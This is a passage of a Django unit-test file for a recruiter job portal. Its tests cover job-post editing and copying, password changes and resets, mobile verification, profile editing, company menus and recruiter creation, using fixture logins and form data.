self.assertTrue(user_login)
self.job_post = JobPost.objects.all()
self.job_post_id = self.job_post.first().id
self.edit_url = reverse('recruiter:edit', kwargs={'job_post_id': self.job_post.first().id})
response = self.client.get(
reverse('recruiter:edit', kwargs={'job_post_id': '250'}))
self.assertEqual(response.status_code, 404)
self.assertTemplateUsed(response, 'recruiter/recruiter_404.html')
response = self.client.get(
reverse('recruiter:edit', kwargs={'job_post_id': self.job_post.first().id}))
self.assertEqual(response.status_code, 200)
self.assertTemplateUsed(response, 'recruiter/job/edit.html')
response = self.client.post(self.edit_url,
data={'title': 'test-job-post',
'job_type': 'full-time',
'status': 'Draft', 'vacancies': '',
'description': 'job post description',
'published_message': 'test message',
'company_address': 'company address',
'company_description': 'company description',
'last_date': self.current_date,
'skills': [self.skill.id],
'location': [self.city.id],
'industry': [self.industry.id],
'functional_area': [self.functional_area.id],
'final_industry': self.other_ind,
'final_skills': self.other_skill,
'final_edu_qualification': self.other_edu,
'final_functional_area': self.fa,
'no_of_interview_location': '0',
'min_year': '1',
'max_year': '0',
'visa_required': ['True'],
'visa_country': ['self.country.id'],
'visa_type': ['hello'],
'code': 'code', 'job_role': 'developer',
'min_month': '2', 'max_month': '1',
'company_name': 'micro',
'company_website': 'http://abc.com',
'company_logo': self.file_dict,
'published_date': '06/23/2018 13:36:28',
'min_salary': '1000',
'max_salary': '2000',
'agency_amount': '10000',
'agency_client': self.agency_company.id,
'agency_category': self.agency_category.id,
'agency_invoice_type': 'Recurring',
'agency_job_type': 'Permanent',
'agency_recruiters': [self.recruiter.id],
'salary_type': 'Year',
'published_message':'hellooo'}
)
self.assertEqual(response.status_code, 200)
error_data = json.loads(str(response.content, encoding='utf-8'))
expected_errors = {'error': True,
'response':
{'visa_country':
['Select a valid choice. That choice is not one of the available choices.']}}
self.assertEqual(error_data, expected_errors)
response = self.client.post(self.edit_url,
data={'title': 'test-job-post',
'status': 'Draft', 'vacancies': '',
'description': 'job post description',
'published_message': 'test message',
'company_address': 'company address',
'company_description': 'company description',
'last_date': self.current_date,
'skills': [self.skill.id],
'location': [self.city.id],
'industry': [self.industry.id],
'functional_area': [self.functional_area.id],
'final_industry': self.other_ind,
'final_skills': self.other_skill,
'final_edu_qualification': self.other_edu,
'final_functional_area': self.fa,
'min_year': '0', 'max_year': '1',
'visa_required': ['True'],
'visa_country': self.country.id,
'country': self.country.id,
'visa_type': ['hello'],
'job_type': 'full-time',
'code': 'code', 'job_role': 'developer',
'min_month': '1', 'max_month': '2',
'company_name': 'micro',
'company_website': 'http://abc.com',
'published_date': '06/23/2018 13:36:28',
'keywords': ['key1', 'key2'],
'min_salary': '1000', 'max_salary': '2000',
'no_of_interview_location': '2',
'final_location_1': ['[13.1543, 77.783]'],
'final_location_2': ['[13.1543, 77.783]'],
'venue_details_2': 'hyd',
'venue_details_1': 'mp',
'show_location_1': 'False',
'salary_type': 'Year',
'show_location_2': 'True',
'agency_amount': '10000',
'agency_client': self.agency_company.id,
'agency_category': self.agency_category.id,
'agency_invoice_type': 'Recurring',
'agency_job_type': 'Permanent',
'agency_recruiters': [self.recruiter.id],
'published_message':'hellooo'
})
self.assertEqual(response.status_code, 200)
error_data = json.loads(str(response.content, encoding='utf-8'))
self.assertEqual(error_data['response'], 'Jobpost Updated Successfully')
response = self.client.post(self.edit_url,
data={'title': 'test-job-post',
'job_type': 'Walk-in',
'status': 'Draft',
'vacancies': '',
'description': 'job post description',
'published_message': 'test message',
'company_address': 'company address',
'company_description': 'company description',
'last_date': self.current_date,
'skills': [self.skill.id],
'location': [self.city.id],
'industry': [self.industry.id],
'functional_area': [self.functional_area.id],
'final_industry': self.other_ind,
'final_skills': self.other_skill,
'final_edu_qualification': self.other_edu,
'final_functional_area': self.fa,
'no_of_interview_location': '0',
'min_year': '1',
'max_year': '0',
'visa_required': ['True'],
'visa_country': self.country.id,
'country': self.country.id,
'visa_type': ['hello'],
'code': 'code',
'job_role': 'developer',
'min_month': '1',
'max_month': '2',
'company_name': 'micro',
'company_website': 'http://abc.com',
'published_date': '06/23/2018 13:36:28',
'keywords': ['key1', 'key2'],
'walkin_from_date': self.walk_in_from_date,
'walkin_to_date': self.walk_in_to_date,
'walkin_time': '00:00',
'walkin_contactinfo': 'hyderabad, india',
'salary_type': 'Year',
'min_salary': '1000',
'max_salary': '2000',
'agency_amount': '10000',
'agency_client': self.agency_company.id,
'agency_category': self.agency_category.id,
'agency_invoice_type': 'Recurring',
'agency_job_type': 'Permanent',
'agency_recruiters': [self.recruiter.id],
'published_message':'hellooo'})
self.assertEqual(response.status_code, 200)
error_data = json.loads(str(response.content, encoding='utf-8'))
self.assertEqual(error_data['response'], 'Jobpost Updated Successfully')
response = self.client.post(self.edit_url,
data={'title': 'test-job-post',
'job_type': 'Walk-in',
'status': 'Pending', 'vacancies': '',
'description': 'job post description',
'published_message': 'test message',
'company_address': 'company address',
'company_description': 'company description',
'last_date': self.current_date,
'skills': [self.skill.id],
'location': [self.city.id],
'industry': [self.industry.id],
'edu_qualification': [self.qualification.id],
'functional_area': [self.functional_area.id],
'final_industry': self.other_ind,
'final_skills': self.other_skill,
'final_edu_qualification': self.other_edu,
'final_functional_area': self.fa,
'no_of_interview_location': '0',
'min_year': '0', 'max_year': '1',
'visa_required': ['True'],
'visa_country': self.country.id,
'country': self.country.id,
'visa_type': ['hello'],
'code': 'code',
'job_role': 'developer',
'min_month': '1', 'max_month': '2',
'company_name': 'micro',
'company_website': 'http://abc.com',
'published_date': '06/23/2018 13:36:28',
'keywords': ['key1', 'key2'],
'walkin_from_date': self.walk_in_from_date,
'walkin_to_date': self.walk_in_to_date,
'walkin_time': '00:00',
'walkin_contactinfo': 'hyderabad, india',
'salary_type': 'Year', 'min_salary': '1',
'max_salary': '3',
'fb_post': 'on', 'tw_post': 'on',
'ln_post': 'on',
'agency_amount': '10000',
'agency_client': self.agency_company.id,
'agency_category': self.agency_category.id,
'agency_invoice_type': 'Recurring',
'agency_job_type': 'Permanent',
'agency_recruiters': [self.recruiter.id],
'published_message':'hellooo'})
self.assertEqual(response.status_code, 200)
error_data = json.loads(str(response.content, encoding='utf-8'))
self.assertEqual(error_data['response'], 'Jobpost Updated Successfully')
response = self.client.post(self.edit_url,
data={'title': 'test-job-post',
'job_type': 'Internship',
'status': 'Pending', 'vacancies': '1',
'description': 'job post description',
'published_message': 'test message',
'company_address': 'company address',
'company_description': 'company description',
'last_date': self.current_date,
'skills': [self.skill.id],
'location': [self.city.id],
'industry': [self.industry.id],
'functional_area': [self.functional_area.id],
'final_industry': self.other_ind,
'final_skills': self.other_skill,
'final_edu_qualification': self.other_edu,
'final_functional_area': self.fa,
'no_of_interview_location': '0',
'min_year': '0', 'max_year': '1',
'visa_required': ['True'],
'visa_country': self.country.id,
'country': self.country.id,
'visa_type': ['hello'],
'code': 'code', 'job_role': 'developer',
'min_month': '1', 'max_month': '2',
'company_name': 'micro',
'company_website': 'http://abc.com',
'published_date': '06/23/2018 13:36:28',
'keywords': ['key1', 'key2'],
'walkin_from_date': self.walk_in_from_date,
'walkin_to_date': self.walk_in_to_date,
'walkin_time': '00:00',
'walkin_contactinfo': 'hyderabad, india',
'min_salary': '1000', 'max_salary': '2000',
'salary_type': 'Month',
'fb_post': 'on', 'tw_post': 'on',
'ln_post': 'on',
'agency_amount': '10000',
'agency_client': self.agency_company.id,
'agency_category': self.agency_category.id,
'agency_invoice_type': 'Recurring',
'agency_job_type': 'Permanent',
'agency_recruiters': [self.recruiter.id],
'published_message':'hellooo'})
self.assertEqual(response.status_code, 200)
error_data = json.loads(str(response.content, encoding='utf-8'))
self.assertEqual(error_data['response'], 'Jobpost Updated Successfully')
def test_view_job(self):
user_login = self.client.login(email='recruiter@mp.com', password='mp')
self.assertTrue(user_login)
self.job_post = JobPost.objects.all()
response = self.client.get(
reverse('recruiter:view', kwargs={'job_post_id': self.job_post.first().id}))
self.assertEqual(response.status_code, 200)
self.assertTemplateUsed(response, 'recruiter/job/view.html')
response = self.client.get(
reverse('recruiter:view', kwargs={'job_post_id': '100'}))
self.assertEqual(response.status_code, 404)
self.assertTemplateUsed(response, 'recruiter/recruiter_404.html')
response = self.client.get(reverse('recruiter:preview', kwargs={
'job_post_id': self.job_post.filter(status='Draft').first().id}))
self.assertEqual(response.status_code, 404)
response = self.client.get(
reverse('recruiter:preview', kwargs={'job_post_id': '100'}))
self.assertEqual(response.status_code, 404)
self.assertTemplateUsed(response, 'recruiter/recruiter_404.html')
response = self.client.get(reverse(
'recruiter:deactivate_job', kwargs={'job_post_id': self.job_post.first().id}))
self.assertEqual(response.status_code, 200)
error_data = json.loads(str(response.content, encoding='utf-8'))
self.assertEqual(error_data['response'], 'Job Post Deactivated')
response = self.client.get(
reverse('recruiter:enable', kwargs={'job_post_id': self.job_post.first().id}))
self.assertEqual(response.status_code, 200)
error_data = json.loads(str(response.content, encoding='utf-8'))
self.assertEqual(
error_data['response'], 'Job Post enabled Successfully')
response = self.client.get(
reverse('recruiter:delete', kwargs={'job_post_id': self.job_post.last().id}))
self.assertEqual(response.status_code, 200)
error_data = json.loads(str(response.content, encoding='utf-8'))
self.assertEqual(
error_data['response'], 'Job Post deleted Successfully')
def test_copy_job(self):
user_login = self.client.login(email='recruiter@mp.com', password='mp')
self.assertTrue(user_login)
self.job_post = JobPost.objects.filter()
self.job_post_id = self.job_post.first().id
self.url = reverse('recruiter:copy', kwargs={
'status': 'full_time'}) + "?jobpost_id=" + str(self.job_post_id)
response = self.client.get(reverse(
'recruiter:copy', kwargs={'status': 'full_time'}) + "?jobpost_id=" + str(100))
self.assertEqual(response.status_code, 404)
self.assertTemplateUsed(response, 'recruiter/recruiter_404.html')
response = self.client.get(self.url)
self.assertEqual(response.status_code, 200)
self.assertTemplateUsed(response, 'recruiter/job/copy.html')
response = self.client.post(self.url,
data={'title': 'test-job-post',
'status': 'Draft',
'vacancies': '',
'description': 'job post description',
'published_message': 'test message',
'company_address': 'company address',
'company_description': 'company description',
'last_date': self.current_date,
'skills': [self.skill.id],
'location': [self.city.id],
'industry': [self.industry.id],
'functional_area': [self.functional_area.id],
'final_industry': self.other_ind,
'final_skills': self.other_skill,
'final_edu_qualification': self.other_edu,
'final_functional_area': self.fa,
'no_of_interview_location': '0',
'min_year': '1', 'max_year': '0',
'visa_required': ['True'],
'visa_country': ['self.country.id'],
'visa_type': ['hello'],
'job_type': 'full-time',
'code': 'code',
'job_role': 'developer',
'min_month': '2', 'max_month': '1',
'company_name': 'micro',
'company_website': 'http://abc.com',
'published_date': '06/23/2018 13:36:28',
'min_salary': '1000',
'max_salary': '2000',
'agency_amount': '10000',
'agency_client': self.agency_company.id,
'agency_category': self.agency_category.id,
'agency_invoice_type': 'Recurring',
'agency_job_type': 'Permanent',
'agency_recruiters': [self.recruiter.id],
'salary_type': 'Year',
'published_message':'hellooo'}
)
self.assertEqual(response.status_code, 200)
error_data = json.loads(str(response.content, encoding='utf-8'))
expected_errors = {'error': True,
'response': {'visa_country': ['Select a valid choice. That choice is not one of the available choices.']}}
self.assertEqual(error_data, expected_errors)
response = self.client.post(self.url, data={'title': 'test-job-post',
'status': 'Draft',
'vacancies': '9',
'description': 'job post description',
'published_message': 'test message',
'company_address': 'company address',
'company_description': 'company description',
'last_date': self.current_date,
'skills': [self.skill.id],
'location': [self.city.id],
'industry': [self.industry.id],
'functional_area': [self.functional_area.id],
'final_industry': self.other_ind,
'final_skills': self.other_skill,
'final_edu_qualification': self.other_edu,
'final_functional_area': self.fa,
'min_year': '0', 'max_year': '1',
'visa_required': ['True'],
'visa_country': self.country.id,
'country': self.country.id,
'visa_type': ['hello'],
'job_type': 'full-time',
'code': 'code', 'job_role': 'developer',
'min_month': '1', 'max_month': '2',
'company_name': 'micro',
'company_website': 'http://abc.com',
'published_date': '06/23/2018 13:36:28',
'keywords': ['key1', 'key2'],
'min_salary': '1000',
'max_salary': '2000',
'no_of_interview_location': '2',
'final_location_1': ['[13.1543, 77.783]'],
'final_location_2': ['[13.1543, 77.783]'],
'venue_details_2': 'hyd',
'venue_details_1': 'mp',
'show_location_1': 'False',
'salary_type': 'Year',
'show_location_2': 'True',
'agency_amount': '10000',
'agency_client': self.agency_company.id,
'agency_category': self.agency_category.id,
'agency_invoice_type': 'Recurring',
'agency_job_type': 'Permanent',
'agency_recruiters': [self.recruiter.id],
'published_message':'hellooo'
})
self.assertEqual(response.status_code, 200)
error_data = json.loads(str(response.content, encoding='utf-8'))
self.assertEqual(error_data['response'], 'Job Post Created Successfully')
response = self.client.post(self.url, data={'title': 'new-copy-test-job-post',
'job_type': 'Walk-in',
'status': 'Draft', 'vacancies': '9',
'description': 'job post description',
'published_message': 'test message',
'company_address': 'company address',
'company_description': 'company description',
'last_date': self.current_date,
'skills': [self.skill.id],
'location': [self.city.id],
'industry': [self.industry.id],
'functional_area': [self.functional_area.id],
'final_industry': self.other_ind,
'final_skills': self.other_skill,
'final_edu_qualification': self.other_edu,
'final_functional_area': self.fa,
'no_of_interview_location': '0',
'min_year': '1',
'max_year': '0',
'visa_required': ['True'],
'visa_country': self.country.id,
'country': self.country.id,
'visa_type': ['hello'],
'code': 'code',
'job_role': 'developer',
'min_month': '1',
'max_month': '2',
'company_name': 'micro',
'company_website': 'http://abc.com',
'published_date': '06/23/2018 13:36:28',
'keywords': ['key1', 'key2'],
'walkin_from_date': self.walk_in_from_date,
'walkin_to_date': self.walk_in_to_date,
'walkin_time': '00:00',
'walkin_contactinfo': 'hyderabad, india',
'salary_type': 'Year',
'min_salary': '1000', 'max_salary': '2000',
'agency_amount': '10000',
'agency_client': self.agency_company.id,
'agency_category': self.agency_category.id,
'agency_invoice_type': 'Recurring',
'agency_job_type': 'Permanent',
'agency_recruiters': [self.recruiter.id],
'published_message':'hellooo'})
self.assertEqual(response.status_code, 200)
error_data = json.loads(str(response.content, encoding='utf-8'))
self.assertEqual(error_data['response'], 'Job Post Created Successfully')
response = self.client.post(self.url, data={'title': 'my-copy-test-job-post',
'job_type': 'Walk-in',
'status': 'Pending',
'vacancies': '7',
'description': 'job post description',
'published_message': 'test message',
'company_address': 'company address',
'company_description': 'company description',
'last_date': self.current_date,
'skills': [self.skill.id],
'location': [self.city.id],
'industry': [self.industry.id],
'edu_qualification': [self.qualification.id],
'functional_area': [self.functional_area.id],
'final_industry': self.other_ind,
'final_skills': self.other_skill,
'final_edu_qualification': self.other_edu,
'final_functional_area': self.fa,
'no_of_interview_location': '0',
'min_year': '0', 'max_year': '1',
'visa_required': ['True'],
'visa_country': self.country.id,
# 'country': self.country.id,
'visa_type': ['hello'],
'code': 'code',
'job_role': 'developer',
'min_month': '1', 'max_month': '2',
'company_name': 'micro',
'company_website': 'http://abc.com',
'published_date': '06/23/2018 13:36:28',
'keywords': ['key1', 'key2'],
'walkin_from_date': self.walk_in_from_date,
'walkin_to_date': self.walk_in_to_date,
'walkin_time': '00:00',
'walkin_contactinfo': 'hyderabad, india',
'salary_type': 'Year', 'min_salary': '1',
'max_salary': '3',
'fb_post': 'on', 'tw_post': 'on',
'ln_post': 'on',
'agency_amount': '10000',
'agency_client': self.agency_company.id,
'agency_category': self.agency_category.id,
'agency_invoice_type': 'Recurring',
'agency_job_type': 'Permanent',
'agency_recruiters': [self.recruiter.id],
'published_message':'hellooo'})
self.assertEqual(response.status_code, 200)
error_data = json.loads(str(response.content, encoding='utf-8'))
self.assertEqual(
error_data['response'], 'Job Post Created Successfully')
response = self.client.post(self.url,
data={'title': 'copy-test-job-post',
'job_type': 'Internship',
'status': 'Pending', 'vacancies': '1',
'description': 'job post description',
'published_message': 'test message',
'company_address': 'company address',
'company_description': 'company description',
'last_date': self.current_date,
'skills': [self.skill.id],
'location': [self.city.id],
'industry': [self.industry.id],
'functional_area': [self.functional_area.id],
'final_industry': self.other_ind,
'final_skills': self.other_skill,
'final_edu_qualification': self.other_edu,
'final_functional_area': self.fa,
'no_of_interview_location': '0',
'min_year': '0', 'max_year': '1',
'visa_required': ['True'],
'visa_country': self.country.id,
# 'country': self.country.id,
'visa_type': ['hello'],
'code': 'code',
'job_role': 'developer',
'min_month': '1', 'max_month': '2',
'company_name': 'micro',
'company_website': 'http://abc.com',
'published_date': '06/23/2018 13:36:28',
'keywords': ['key1', 'key2'],
'walkin_from_date': self.walk_in_from_date,
'walkin_to_date': self.walk_in_to_date,
'walkin_time': '00:00',
'walkin_contactinfo': 'hyderabad, india',
'min_salary': '1000',
'max_salary': '2000',
'salary_type': 'Year',
'fb_post': 'on', 'tw_post': 'on',
'ln_post': 'on',
'agency_amount': '10000',
'agency_client': self.agency_company.id,
'agency_category': self.agency_category.id,
'agency_invoice_type': 'Recurring',
'agency_job_type': 'Permanent',
'agency_recruiters': [self.recruiter.id],
'published_message':'hellooo'})
self.assertEqual(response.status_code, 200)
error_data = json.loads(str(response.content, encoding='utf-8'))
self.assertEqual(
error_data['response'], 'Job Post Created Successfully')
# def test_send_mobile_verification_code(self):
# user_login = self.client.login(email='recruiter@mp.com', password='mp')
# self.assertTrue(user_login)
# self.url = reverse('recruiter:send_mobile_verification_code')
# response = self.client.post(self.url, {'': ''})
# self.assertEqual(response.status_code, 302)
# error_data = json.loads(str(response.content, encoding='utf-8'))
# expected_errors = {
# 'message': 'OTP Already sent to you, Please request new OTP', 'error': True}
# self.assertEqual(error_data, expected_errors)
def test_change_password(self):
user_login = self.client.login(email='recruiter@mp.com', password='mp')
self.assertTrue(user_login)
self.url = reverse('recruiter:change_password')
response = self.client.get(self.url)
self.assertEqual(response.status_code, 200)
self.assertTemplateUsed(
response, 'recruiter/user/change_password.html')
response = self.client.post(
self.url,
{
'oldpassword': 'mp', 'newpassword': 'pwd', 'retypepassword': 'pwd'
})
self.assertEqual(response.status_code, 200)
self.assertTrue(
str('Password changed successfully') in response.content.decode('utf8'))
user_login = self.client.login(
email='recruiter@mp.com', password='pwd')
response = self.client.post(
self.url,
{
'oldpassword': 'micro123', 'newpassword': 'mp', 'retypepassword': 'mp'
})
self.assertEqual(response.status_code, 200)
self.assertEqual(response.status_code, 200)
self.assertFalse(
str('Password changed successfully') in response.content.decode('utf8'))
response = self.client.post(
self.url,
{
'oldpassword': 'pwd', 'newpassword': 'micro123', 'retypepassword': 'mp'
})
self.assertEqual(response.status_code, 200)
self.assertFalse(
str('Password changed successfully') in response.content.decode('utf8'))
response = self.client.post(
self.url,
{
'newpassword': 'pwd', 'retypepassword': 'pwd'
})
self.assertEqual(response.status_code, 200)
self.assertFalse(
str('Password changed successfully') in response.content.decode('utf8'))
response = self.client.post(
self.url,
{
'oldpassword': 'pwd', 'newpassword': 'mp', 'retypepassword': 'mp'
})
self.assertEqual(response.status_code, 200)
self.assertTrue(
str('Password changed successfully') in response.content.decode('utf8'))
def test_user_password_reset(self):
self.url = reverse('recruiter:user_password_reset')
response = self.client.get(self.url)
self.assertEqual(response.status_code, 200)
error_data = json.loads(str(response.content, encoding='utf-8'))
expected_errors = {
'error': True, "email": "Method is not supported"}
self.assertEqual(error_data, expected_errors)
response = self.client.post(self.url, {'email': 'recruiter@mp.com'})
self.assertEqual(response.status_code, 200)
error_data = json.loads(str(response.content, encoding='utf-8'))
expected_errors = {
'error': False, 'info': 'Sent a link to your email, reset your password by clicking that link'}
self.assertEqual(error_data, expected_errors)
response = self.client.post(
self.url, {'email': 'new_recruiter@mp.com'})
self.assertEqual(response.status_code, 200)
error_data = json.loads(str(response.content, encoding='utf-8'))
expected_errors = {
'error': True, 'email': 'User With this Email ID not Registered'}
self.assertEqual(error_data, expected_errors)
def test_verify_mobile(self):
user_login = self.client.login(
email='recruiter_mobile@mp.com', password='mp')
self.assertTrue(user_login)
self.url = reverse('recruiter:verify_mobile')
response = self.client.get(self.url)
self.assertEqual(response.status_code, 200)
self.assertTemplateUsed(response, 'recruiter/user/mobile_verify.html')
response = self.client.post(
self.url, {'mobile_verification_code': 'abcde'})
self.assertEqual(response.status_code, 200)
error_data = json.loads(str(response.content, encoding='utf-8'))
expected_errors = {'error': True, 'response': {
'mobile_verification_code': "Otp didn't match, Try again later"}}
self.assertEqual(error_data, expected_errors)
response = self.client.post(
self.url, {'mobile_verification_code': '123456'})
self.assertEqual(response.status_code, 200)
error_data = json.loads(str(response.content, encoding='utf-8'))
expected_errors = {
'error': False, 'message': 'Mobile Verified successfully'}
self.assertEqual(error_data, expected_errors)
def test_edit_profile(self):
user_login = self.client.login(
email='recruiter_mobile@mp.com', password='mp')
self.assertTrue(user_login)
self.url = reverse('recruiter:edit_profile')
self.user = User.objects.get(email='recruiter_mobile@mp.com')
self.user.mobile_verified = False
self.last_mobile_code_verified_on = '06/23/2018 13:36:28'
response = self.client.get(
reverse('recruiter:account_activation', kwargs={'user_id': self.recruiter.id}))
self.assertEqual(response.status_code, 404)
self.user.mobile_verified = True
response = self.client.get(
reverse('recruiter:account_activation', kwargs={'user_id': self.recruiter.id}))
self.assertEqual(response.status_code, 404)
response = self.client.get(self.url)
self.assertEqual(response.status_code, 200)
self.assertTemplateUsed(response, 'recruiter/user/details.html')
response = self.client.post(self.url, {'username': 'recruiter123',
'first_name': 'recruiter',
'last_name': 'recruiter',
'nationality': '1',
'mobile': '0987654321',
'technical_skills': [self.skill.id],
'industry': [self.industry.id],
'functional_area': [self.functional_area.id],
'year': '1990',
'month': '5',
'profile_description': 'recruiter description',
'job_role': 'developer',
'company_type': 'startup',
'city': self.city.id,
'state': self.state.id,
'user_id': self.user.id,
'dob': '09/09/1970',
'name': 'microtest',
'website': 'microcompany.com',
'address': 'hello',
'permanent_address': 'jrlo',
'marital_status': 'Married'})
self.assertEqual(response.status_code, 200)
# upload_file = open('static/img/report.png', 'rb')
# file_dict = {'profile_pic': SimpleUploadedFile(
# upload_file.name, upload_file.read())}
# data = {'username': 'recruiter', 'first_name': 'recruiter',
# 'last_name': 'recruiter', 'nationality': '1',
# 'mobile': '0987654321', 'technical_skills': [self.skill.id],
# 'industry': [self.industry.id],
# 'functional_area': [self.functional_area.id], 'year': '1990',
# 'month': '5', 'profile_description': 'recruiter description',
# 'job_role': 'developer', 'company_type': 'startup', 'name': 'mp',
# 'city': self.city.id, 'state': self.state.id,
# 'user_id': self.user.id, 'show_email': 'on', 'email_notifications': 'on', 'dob': '09-09-1990'}
# response = self.client.post(self.url, data, file_dict, format='multipart/form-data')
# self.assertEqual(response.status_code, 200)
def test_index(self):
self.url = reverse('recruiter:new_user')
self.inactive_recruiter.is_active = False
self.inactive_recruiter.save()
response = self.client.get(self.url)
self.assertEqual(response.status_code, 200)
self.assertTemplateUsed(response, 'recruiter/register.html')
response = self.client.post(
self.url, {'email': self.inactive_recruiter.email, 'password': 'mp123'})
self.assertEqual(response.status_code, 200)
response = self.client.post(
self.url, {'email': self.inactive_recruiter.email, 'password': 'mp'})
self.assertEqual(response.status_code, 200)
self.inactive_recruiter.is_active = True
self.inactive_recruiter.save()
response = self.client.post(
self.url, {'email': self.inactive_recruiter.email, 'password': 'mp'})
self.assertEqual(response.status_code, 200)
# error_data = json.loads(str(response.content, encoding='utf-8'))
def test_company_add_menu(self):
user_login = self.client.login(email='recruiter@mp.com', password='mp')
self.assertTrue(user_login)
self.url = reverse('recruiter:add_menu')
response = self.client.post(
self.url, {'title': 'company-menu', 'url': '', 'status': 'True'})
self.assertEqual(response.status_code, 200)
error_data = json.loads(str(response.content, encoding='utf-8'))
expected_errors = {
'response': {'url': ['This field is required.']}, 'error': True}
self.assertEqual(error_data, expected_errors)
response = self.client.post(self.url, {
'title': 'company-menu',
'url': 'http://testingsite.com/company',
'status': 'True'})
self.assertEqual(response.status_code, 200)
error_data = json.loads(str(response.content, encoding='utf-8'))
expected_errors = {
"error": False, 'response': 'Menu created successfully'}
self.assertEqual(error_data, expected_errors)
response = self.client.post(self.url, {
'title': 'company-menu-new',
'url': 'http://testing.com/company',
'status': 'True'})
self.assertEqual(response.status_code, 200)
error_data = json.loads(str(response.content, encoding='utf-8'))
expected_errors = {
"error": False, 'response': 'Menu created successfully'}
self.assertEqual(error_data, expected_errors)
response = self.client.post(self.url, {
'title': 'company-menu-other',
'url': 'http://testing.com/other-company',
'status': 'True'})
self.assertEqual(response.status_code, 200)
error_data = json.loads(str(response.content, encoding='utf-8'))
expected_errors = {
"error": False, 'response': 'Menu created successfully'}
self.assertEqual(error_data, expected_errors)
def test_company_edit_menu(self):
user_login = self.client.login(email='recruiter@mp.com', password='mp')
self.assertTrue(user_login)
self.menu = Menu.objects.create(
title="menu-test",
url='http://micropyramid.com/testing',
lvl='123',
company=self.recruiter.company)
self.url = reverse(
'recruiter:edit_menu', kwargs={'menu_id': self.menu.id})
response = self.client.post(
self.url, {'title': 'company-menu', 'url': '', 'status': 'True'})
self.assertEqual(response.status_code, 200)
error_data = json.loads(str(response.content, encoding='utf-8'))
expected_errors = {
'response': {'url': ['This field is required.']}, 'error': True}
self.assertEqual(error_data, expected_errors)
response = self.client.post(self.url, {
'title': 'company new menu',
'url': 'http://testingsite.com/new-company',
'status': 'False'})
self.assertEqual(response.status_code, 200)
error_data = json.loads(str(response.content, encoding='utf-8'))
expected_errors = {
"error": False, 'response': 'Menu created successfully'}
self.assertEqual(error_data, expected_errors)
def test_company_menu_status(self):
user_login = self.client.login(email='recruiter@mp.com', password='mp')
self.assertTrue(user_login)
self.url = reverse('recruiter:menu_status', kwargs={'menu_id': '1'})
response = self.client.get(self.url)
self.assertEqual(response.status_code, 302)
response = self.client.get(self.url)
self.assertEqual(response.status_code, 302)
response = self.client.get(
reverse('recruiter:menu_status', kwargs={'menu_id': '10'}))
self.assertEqual(response.status_code, 302)
def test_company_menu_order(self):
user_login = self.client.login(email='recruiter@mp.com', password='mp')
self.assertTrue(user_login)
self.url = reverse('recruiter:menu_order')
response = self.client.get(reverse('jobs:index') + '?prev=1¤t=2')
self.assertEqual(response.status_code, 200)
response = self.client.get(reverse('jobs:index') + '?prev=2¤t=1')
self.assertEqual(response.status_code, 200)
def test_company_delete_menu(self):
user_login = self.client.login(email='recruiter@mp.com', password='mp')
self.assertTrue(user_login)
self.menu = Menu.objects.create(
title="test-mneu", url='http://micropyramid.com', lvl='123',
company=self.recruiter.company)
self.url = reverse(
'recruiter:delete_menu', kwargs={'menu_id': self.menu.id})
response = self.client.get(self.url)
self.assertEqual(response.status_code, 200)
error_data = json.loads(str(response.content, encoding='utf-8'))
expected_errors = {
"error": False, 'response': 'Menu Deleted Successfully'}
self.assertEqual(error_data, expected_errors)
response = self.client.get(
reverse('recruiter:delete_menu', kwargs={'menu_id': '10'}))
self.assertEqual(response.status_code, 200)
error_data = json.loads(str(response.content, encoding='utf-8'))
expected_errors = {"error": True, 'response': 'Some Problem Occurs'}
self.assertEqual(error_data, expected_errors)
def test_company(self):
user_login = self.client.login(email='recruiter@mp.com', password='mp')
self.assertTrue(user_login)
response = self.client.get(reverse('recruiter:view_company'))
self.assertEqual(response.status_code, 200)
self.assertTemplateUsed(
response, 'recruiter/company/view_microsite_page.html')
response = self.client.get(reverse('recruiter:company_recruiter_list'))
self.assertEqual(response.status_code, 200)
self.assertTemplateUsed(
response, 'recruiter/company/recruiter_list.html')
response = self.client.get(
reverse('recruiter:company_recruiter_list') + '?search=active')
self.assertEqual(response.status_code, 200)
self.assertTemplateUsed(
response, 'recruiter/company/recruiter_list.html')
response = self.client.get(
reverse('recruiter:company_recruiter_list') + '?search=recruiter')
self.assertEqual(response.status_code, 200)
self.assertTemplateUsed(
response, 'recruiter/company/recruiter_list.html')
response = self.client.get(
reverse('recruiter:company_recruiter_list') + '?page=1')
self.assertEqual(response.status_code, 200)
self.assertTemplateUsed(
response, 'recruiter/company/recruiter_list.html')
response = self.client.get(reverse(
'recruiter:company_recruiter_profile', kwargs={'recruiter_id': self.recruiter.id}))
self.assertEqual(response.status_code, 200)
self.assertTemplateUsed(
response, 'recruiter/company/recruiter_profile.html')
response = self.client.get(
reverse('recruiter:company_recruiter_profile', kwargs={'recruiter_id': '1000'}))
self.assertEqual(response.status_code, 404)
self.assertTemplateUsed(response, 'recruiter/recruiter_404.html')
response = self.client.get(reverse('recruiter:company_recruiter_profile', kwargs={
'recruiter_id': self.recruiter.id}) + '?job_status=Live')
self.assertEqual(response.status_code, 200)
self.assertTemplateUsed(
response, 'recruiter/company/recruiter_profile.html')
response = self.client.get(reverse('recruiter:company_recruiter_profile', kwargs={
'recruiter_id': self.recruiter.id}) + '?search_value=Internship')
self.assertEqual(response.status_code, 200)
self.assertTemplateUsed(
response, 'recruiter/company/recruiter_profile.html')
response = self.client.get(reverse('recruiter:company_recruiter_profile', kwargs={
'recruiter_id': self.recruiter.id}) + '?page=1')
self.assertEqual(response.status_code, 200)
self.assertTemplateUsed(
response, 'recruiter/company/recruiter_profile.html')
response = self.client.get(reverse(
'recruiter:activate_company_recruiter', kwargs={'recruiter_id': self.recruiter.id}))
self.assertEqual(response.status_code, 302)
response = self.client.get(reverse(
'recruiter:activate_company_recruiter', kwargs={'recruiter_id': self.recruiter.id}))
self.assertEqual(response.status_code, 302)
response = self.client.get(
reverse('recruiter:activate_company_recruiter', kwargs={'recruiter_id': '100'}))
self.assertEqual(response.status_code, 302)
def test_company_recruiter_create(self):
user_login = self.client.login(email='recruiter@mp.com', password='mp')
self.assertTrue(user_login)
response = self.client.get(
reverse('recruiter:company_recruiter_create'))
self.assertEqual(response.status_code, 200)
self.assertTemplateUsed(
response, 'recruiter/company/create_recruiter.html')
response = self.client.post(reverse('recruiter:company_recruiter_create'),
data={'mobile': '8977455970',
'email': 'testrecruiter@mp.com',
'job_role': 'developer',
'first_name': 'testreruiter',
'password': 'Mp1234@'})
self.assertEqual(response.status_code, 200)
error_data = json.loads(str(response.content, encoding='utf-8'))
expected_errors = {
'response': 'Recruiter Created Successfully', 'error': False}
